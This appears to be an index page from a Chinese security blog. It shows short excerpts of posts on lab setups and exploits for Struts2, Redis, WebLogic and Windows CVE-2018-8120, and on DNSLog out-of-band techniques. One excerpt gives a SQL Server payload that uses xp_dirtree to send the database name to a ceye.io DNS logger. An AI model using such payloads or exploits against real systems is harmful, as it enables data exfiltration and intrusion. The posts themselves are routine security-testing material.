GET 类型 # -*- coding:utf-8 -*- import requests headers = { 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3)AppleWebKit / 535.20(KHTML, like Gecko) Chro...

本来想着来弄几个st2 的老漏洞来测试一下 找了一圈。还是选择了docker 进入dockerhub  找了一下。发现有一个全版本的老的st2  This image contains demo applications for...

远程代码执行redis4和redis5 来自https://github.com/jas502n/Redis-RCE python代码 [root@btmail script]# git clone https://github.com/jas502n/Redis-RCE.git ...

Docker 搭建环境 docker pull ismaleiva90/weblogic12 docker run -d -p 49163:7001 -p 49164:7002 -p 49165:5556 ismaleiva90/weblogic12:latest http://localhost:49163/console User: weblogi...

开源的DNS_log 平台 https://github.com/BugScanTeam/DNSLog 下载源代码 [root@btmail ~]# cd /dnslog/ [root@btmail dnslog]# git clone https://github.com/BugScanTeam/DNS...

DECLARE @host varchar(128); SELECT @host=(select db_name())+ '.hfkzaq.ceye.io'; select @host; EXEC('master..xp_dirtree "\\'+@host+'\foobar$"'); ...

DNSLOG的原理 DNS的解析是递归与迭代相结合的，下面给出了当我们访问 www.o2oxy.cn 时. 最后面访问的还是该域名的NS 服务器。阿里云的域名的NS 记录都是可以修改的。也就是说。如果我们本地建立一...

github: https://github.com/Liang2580/chunked-coding-converter jar 如下： 11111111

漏洞描述： 北京时间2018年10月17日，Oracle官方发布的10月关键补充更新CPU（重要补丁更新）中修复了一个高危的WebLogic远程代码执行漏洞（CVE-2018-3191）。 该漏洞允许未经身份验证的攻击者通过T3协...

https://github.com/unamer/CVE-2018-8120 CVE-2018-8120 CVE-2018-8120 Windows LPE exploit Supports both x32 and x64. Tested on: Win7 x32, Win7 x64...